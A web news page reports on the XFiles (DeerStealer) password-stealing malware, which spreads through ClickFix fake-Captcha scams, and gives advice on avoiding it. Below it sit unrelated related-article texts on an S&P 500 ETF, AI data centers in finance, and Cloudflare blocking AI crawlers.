Your Passwords Are At Risk — New Windows XFiles Attack Confirmed
Windows passwords come under attack from XFiles threat.
Two things that are guaranteed to strike fear into the hearts of anyone concerned about cybersecurity attacks are Windows and passwords. Combine the two, and you have the basis of what can be something of a security nightmare. With Microsoft account password spraying attacks and warnings over opening specific Outlook files in the news as Windows email, passwords and 2FA codes come under attack, this is kind of understandable. Now, with confirmation of a password-stealing threat called XFiles, is there even more cause for concern? The truth, as they say, is out there.
A group of self-proclaimed elite threat hunters and cyber analysts has issued a warning that attackers deploying a malware payload called Xfiles, also known as DeerStealer, are targeting Windows users in order to compromise passwords that can then be sold on dark web criminal marketplaces.
A June 12 report published by the eSentire Threat Response Unit has revealed how, throughout May, threats actors have been using the XFiles payload in order to steal Windows passwords that can then be sold by a dark web user known only as LuciferXfiles.
The methods employed are sadly all too familiar, involving ClickFix attacks during the initial access process. These tech support scams combine seemingly genuine offers of help regarding security issues surrounding account activity with fake ID Captcha prompts that involve executing malicious commands using the Windows Run prompt.
Should the victim get to this stage, they will then download something called HijackLoader, often obfuscated using an encrypted PNG image, that downloads the real payload, the XFiles infostealer malware to compromise passwords, browser 2FA session cookies, instant messages and more.
Read the full report for a detailed technical analysis of the entire attack chain. When it comes to mitigation, however, the eSentire TRU advice is clear:
I would have to add to this that opening the Windows Run prompt and pasting the clipboard's content, which is how ClickFix attacks work, is hardly conducive to good security practice or, frankly, common sense. I mean, how many Captcha or I Am Not A Robot tests have ever asked you to do that? The answer is zero. Protect your passwords by not being tricked into doing something that is so obviously out of the ordinary.
Hashtags
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Yahoo
an hour ago
- Yahoo
1 No-Brainer S&P Index Fund to Buy Right Now for Less Than $1,000
S&P 500 index ETFs make it easy to simply invest in the S&P 500 itself. You can gain this broad exposure through the iShares Core S&P 500 ETF. This ETF tracks the 500 companies comprising the S&P 500, and delivers heavy diversification to any portfolio. 10 stocks we like better than iShares Trust - iShares Core S&P 500 ETF › Exchange-traded funds (ETFs) make investing easy. While you may be able to make more money by investing in individual stocks, having a good ETF in your portfolio creates a great deal of both diversification and consistency. Over the long term, the broader market, represented by the S&P 500, has produced steady gains over the decades, with gains of more than 100% in the last five years. Is this the most exciting investment prospect? Well, not when you compare it to directly investing in a flashy stock like Tesla. But finding investments that track the S&P 500 index helps to minimize risk. Let's talk about one ETF in particular. The basic investment thesis behind the iShares Core S&P 500 ETF (NYSEMKT: IVV) is straightforward: Over the long term, the U.S. stock market grows. By owning shares in IVV, you gain exposure to all 500 companies in the S&P 500, including industry leaders like Apple, Microsoft, Amazon, and Johnson & Johnson. This broad exposure helps spread out risk. If one sector underperforms, gains in another can help balance it out. If you're a new investor, or looking to build a strong core for your portfolio, the iShares Core S&P 500 ETF is a solid foundation. You're not betting on any single company to outperform. Instead, you're investing in the idea that the American economy will continue to expand over time, and that the largest companies within it will generally do well. This is a concept that superinvestor Warren Buffett has spoken about for a long time. Another reason IVV is so attractive is its cost. With an expense ratio of just 0.03%, it's one of the most affordable ways to gain exposure to the S&P 500. That low fee means more of your money stays invested and working for you, instead of being chipped away by fund management costs. Over time, small differences in fees can have a significant impact on your total returns. IVV's low cost makes it an efficient way to invest, especially if you're focused on maximizing long-term gains without sacrificing too much to a fund's expenses. Admittedly, investing in an ETF that tracks the S&P 500 might not be the most exciting strategy. It's not going to provide the kind of dramatic, short-term returns that a hot tech stock like Tesla might offer. But it also doesn't expose you to the same level of risk. The beauty of IVV lies in its reliability and simplicity. You're not chasing fads or trying to time the market. You're just investing in a broad slice of the U.S. economy and letting time do the work. All in all, the iShares Core S&P 500 ETF is an ideal investment for those who value simplicity, cost-effectiveness, and long-term performance. IVV has delivered gains of 103% over the last five years; whether you're just starting your investing journey or looking to strengthen your existing portfolio, it offers a proven way to participate in the growth of the U.S. stock market without overcomplicating things. It might not be flashy, but it's smart -- and in investing, smart tends to win over time. Before you buy stock in iShares Trust - iShares Core S&P 500 ETF, consider this: The Motley Fool Stock Advisor analyst team just identified what they believe are the for investors to buy now… and iShares Trust - iShares Core S&P 500 ETF wasn't one of them. The 10 stocks that made the cut could produce monster returns in the coming years. Consider when Netflix made this list on December 17, 2004... if you invested $1,000 at the time of our recommendation, you'd have $713,547!* Or when Nvidia made this list on April 15, 2005... if you invested $1,000 at the time of our recommendation, you'd have $966,931!* Now, it's worth noting Stock Advisor's total average return is 1,062% — a market-crushing outperformance compared to 177% for the S&P 500. Don't miss out on the latest top 10 list, available when you join . See the 10 stocks » *Stock Advisor returns as of June 30, 2025 John Mackey, former CEO of Whole Foods Market, an Amazon subsidiary, is a member of The Motley Fool's board of directors. David Butler has no position in any of the stocks mentioned. The Motley Fool has positions in and recommends Amazon, Apple, Microsoft, and Tesla. The Motley Fool recommends Johnson & Johnson and recommends the following options: long January 2026 $395 calls on Microsoft and short January 2026 $405 calls on Microsoft. The Motley Fool has a disclosure policy. 1 No-Brainer S&P Index Fund to Buy Right Now for Less Than $1,000 was originally published by The Motley Fool Sign in to access your portfolio
Forbes
an hour ago
- Forbes
The Data Centers Powering AI Boom In Financial Services
Global power demand from data centers will increase 50% by 2027 because of the adoption of AI. Financial institutions are adopting AI at an increasing rate, a recent study by Goldman Sachs forecasts global power demand from data centers will increase 50% by 2027 and by as much as 165% by the end of the decade. To explore this in-depth, I met with Bill Borden, Corporate Vice President Worldwide Financial Services at Microsoft; John Kain, Head of Financial Services Market Development at AWS; and Toby Brown, Head of Global Financial Services Solutions at Google Cloud, for a discussion about the road ahead for the finance industry. Video: Bill Borden, Corporate Vice President, Worldwide Financial Services at Microsoft Unlocking AI Through Data Management "Financial services has always managed data robustly due to regulatory needs," Borden begins. "Clean, correct, and structured data is foundational for decision-making analytics and for integrating advanced AI tools like generative AI models." Microsoft's recent launch of Microsoft Fabric, a cloud-based data and analytics platform designed to consolidate and manage data across various environments, exemplifies this strategic emphasis. Google Cloud's Toby Brown amplifies this sentiment, noting historically that financial institutions have been "data-rich but insight-poor." Brown delineates between data "for offense", used to drive business growth, and "for defense", supporting risk management and regulatory compliance. According to Brown, Google Cloud provides a single data system that allows financial institutions like Citi and PayPal to integrate data traditionally siloed in spreadsheets and legacy systems into unified cloud-based platforms with AI models and generative AI tooling built directly in line to accelerate insights and decision-making processes. AWS's John Kain concurs, adding that "breaking down data silos within financial institutions is critical." He cites successful examples like BBVA, which has leveraged AWS to establish a comprehensive data-sharing framework. Similarly, Goldman Sachs and JPMorgan have commercialized their expertise in data aggregation and analysis, signaling a shift toward more collaborative and efficient data ecosystems. Video: John Kain, Head of Financial Services Market Development at AWS Shifts in AI Adoption AI and machine learning are already deeply embedded in financial operations, though the acceleration of generative AI tools has significantly transformed implementation approaches. Kain highlights how generative AI enables rapid deployment of sophisticated applications without extensive model training previously required, "Customers can now automate and innovate more quickly, significantly enhancing operational efficiency". Brown highlights real-world use cases, such as marketing personalization, and customer service improvements at Discover, where Google's Gemini assists over 10,000 agents by instantly accessing vast institutional knowledge, transforming service interactions into potential sales opportunities. Brown notes, "Banks finally have the ability to transform cost centers like contact centers into genuine revenue generators." Borden emphasizes developer productivity, citing GitHub Copilot, which has already demonstrated dramatic productivity gains at Citi, allowing thousands of developers to code more efficiently and securely. Video: Toby Brown, Head of Global Financial Services Solutions at Google Cloud Balancing Innovation and Regulation Despite these successes, AI deployment in financial services isn't without challenges. "The industry naturally prioritizes regulatory compliance," Kain observes. Regulatory frameworks for algorithmic transparency and risk management are already embedded, providing financial firms with a head start compared to other sectors. Brown emphasizes that risk management remains a crucial focus, noting banks often start with low-risk applications, utilizing Google Cloud's built-in security and compliance tools to mitigate potential risks. Borden also underscores the importance of collaborative engagements between technology providers and regulators, stressing the necessity of responsible AI frameworks to ensure secure, compliant deployments. Future Forward: AI's Potential Looking ahead, the trio forecast transformative developments in the next few years. Microsoft's Work Trend Index 2025 report, shows a dramatic rise in "digital labor," with AI-powered agents seamlessly collaborating with human teams. "Insights will be instantly available," says Borden, reshaping workflows and business processes significantly. Kain predicts a substantial evolution in "agentic generative AI," where sophisticated AI agents autonomously handle complex financial tasks, effectively replacing traditional API-driven systems. This will revolutionize how banks innovate, significantly accelerating application development and deployment. Brown expresses excitement about multimodal and agentic generative AI capabilities, predicting a fundamental shift in how financial advice is delivered. Rather than static, flat reports and charts, personalized financial guidance could soon be delivered interactively through diverse media like video or podcasts, enhancing customer engagement and financial literacy. Navigating Tomorrow's AI Landscape We concluded with a consensus on AI's expansive potential to reshape the financial sector profoundly. Institutions that successfully integrate robust data strategies, effectively balance innovation with regulatory compliance, and harness cutting-edge generative AI tools will position themselves as future industry leaders. In this evolving landscape, financial services companies must embrace change, leverage innovative AI tools responsibly, and prepare strategically for the transformative impacts ahead. As Brown aptly concludes, the future promises not only technological advancement but a meaningful shift toward enhanced customer experiences and deeper financial empowerment. More like this on Forbes, 3 No-Code AI Tools Changing How Financial Institutions Innovate and How Financial Services Can Tackle AI-Powered Fraud.
CNBC
2 hours ago
- CNBC
Web giant Cloudflare to block AI bots from scraping content by default
Internet firm Cloudflare will start blocking artificial intelligence crawlers from accessing content without website owners' permission by default, in a move that could significantly impact AI developers' ability to train their models. Starting Tuesday, every new web domain that signs up to Cloudflare will be asked if they want to allow AI crawlers, effectively giving them the ability to prevent bots from scraping data from their websites. Cloudflare is what's called a content delivery network, or CDN. It helps businesses deliver online content and applications faster by caching the data closer to end-users. They play a significant role in making sure people can access web content seamlessly every day. Roughly 16% of global internet traffic goes directly through Cloudflare's CDN, the firm estimated in a 2023 report. "AI crawlers have been scraping content without limits. Our goal is to put the power back in the hands of creators, while still helping AI companies innovate," said Matthew Prince, co-founder and CEO of Cloudflare, in a statement Tuesday. "This is about safeguarding the future of a free and vibrant Internet with a new model that works for everyone," he added. AI crawlers are automated bots designed to extract large quantities of data from websites, databases and other sources of information to train large language models from the likes of OpenAI and Google. Whereas the internet previously rewarded creators by directing users to original websites, according to Cloudflare, today AI crawlers are breaking that model by collecting text, articles and images to generate responses to queries in a way that users don't need to visit the original source. This, the company adds, is depriving publishers of vital traffic and, in turn, revenue from online move builds on a tool Cloudflare launched in September last year that gave publishers the ability to block AI crawlers with a single click. Now, the company is going a step further by making this the default for all websites it provides services for. OpenAI says it declined to participate when Cloudflare previewed its plan to block AI crawlers by default on the grounds that the content delivery network is adding a middleman to the system. The Microsoft-backed AI lab stressed its role as a pioneer of using a set of code that prevents automated scraping of web data, and said its crawlers respect publisher preferences. "AI crawlers are typically seen as more invasive and selective when it comes to the data they consumer. They have been accused of overwhelming websites and significantly impacting user experience," Matthew Holman, a partner at U.K. law firm Cripps, told CNBC. "If effective, the development would hinder AI chatbots' ability to harvest data for training and search purposes," he added. "This is likely to lead to a short term impact on AI model training and could, over the long term, affect the viability of models."
